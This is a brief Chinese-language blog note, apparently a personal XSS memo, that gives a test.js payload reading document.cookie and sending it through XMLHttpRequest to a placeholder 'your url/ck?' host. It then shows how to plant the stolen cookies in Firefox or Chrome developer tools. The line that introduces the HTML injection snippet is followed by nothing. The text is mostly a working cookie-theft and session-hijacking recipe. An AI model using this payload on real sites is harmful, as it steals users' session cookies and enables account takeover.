xss

可以先写好test.js:

var href="your url/ck?"+document.cookie
var request = new XMLHttpRequest();
request.open("GET",href,true);
request.send();

嵌入html的js语句:


这样就可以在自己的url上收到cookie了

火狐浏览器F12 里面有个cookie项可编辑cookie
谷歌需要F12后在Console里写代码:

document.cookie = "cookie_name=cookie_value"

你可能感兴趣的:(xss)